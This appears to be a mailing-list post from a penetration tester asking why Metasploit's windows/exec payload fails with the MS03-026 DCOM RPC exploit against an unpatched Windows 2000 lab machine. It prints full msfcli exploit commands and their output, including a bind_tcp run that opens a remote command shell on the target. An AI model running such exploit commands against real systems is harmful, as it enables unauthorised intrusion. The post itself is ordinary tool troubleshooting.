Re: windows/exec Payload problems.

[a10n3.s7r1k3r at gmail.com (Kashif Iftikhar)]

Hello,

 I was trying to work with the command execute payload and I can't
seem to get it to work. I tested it on both 2.7 and 3.0 beta3 updated
via SVN. I am using ms03_026_dcom (the dcom RPC exploit).

 The system I am testing against is windows 2000 professional without
any SPs installed.

 Here is a sample of output using msfcli from 3.0

-------------------------------------------------------------------
root at S7R1K3R:/pentest/exploits/framework-3.0-beta-3$ ./msfcli
"exploit/windows/dcerpc/ms03_026_dcom" PAYLOAD="windows/exec" CMD="md
abc" RHOST="192.168.0.17" E
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0 at ncacn_ip_tcp:192.168.0.17[135]
...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0 at ncacn_ip_tcp:192.168.0.17[135]
...
[*] Sending exploit ...
Exploit failed: end of file reached
Backtrace:
./lib/rex/io/stream.rb:58:in `sysread'
./lib/rex/io/stream.rb:58:in `read'
./lib/rex/io/stream.rb:181:in `get_once'
./lib/rex/proto/dcerpc/client.rb:150:in `read'
./lib/rex/proto/dcerpc/client.rb:230:in `call'
./lib/msf/core/exploit/dcerpc.rb:97:in `dcerpc_call'
/pentest/exploits/framework-3.0-beta-3/modules/exploits/windows/dcerpc/ms03_026_dcom.rb:206:in
`exploit'
./lib/msf/core/exploit_driver.rb:189:in `job_run_proc'
./lib/msf/core/exploit_driver.rb:152:in `run'
./lib/msf/base/simple/exploit.rb:118:in `exploit_simple'
./lib/msf/base/simple/exploit.rb:127:in `exploit_simple'
./msfcli:153



root at S7R1K3R:/pentest/exploits/framework-3.0-beta-3$ ./msfcli
"exploit/windows/dcerpc/ms03_026_dcom"
PAYLOAD="windows/shell/bind_tcp" RHOST="192.168.0.17" E
[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0 at ncacn_ip_tcp:192.168.0.17[135]
...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0 at ncacn_ip_tcp:192.168.0.17[135]
...
[*] Sending exploit ...
[*] Sending stage (474 bytes)
[*] The DCERPC service did not reply to our request
[*] Command shell session 1 opened (192.168.0.21:58937 -> 192.168.0.17:4444)

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

C:\WINNT\system32>
-------------------------------------------------------------------------

 As can be seen, other payloads like bind shell work fine.

 Also one other strange thing that I noticed is that with 2.7 I can
repeatedly exploit the same box and the service crashes after several
successful attempts while with 3.0, I only get one attempt and after
one successful attempt, the service no longer seems to be exploitable.

 Am I doing something wrong here or is it a bug? I am sorry if
someone else already has pointed to this.


 Regards,

Kashif.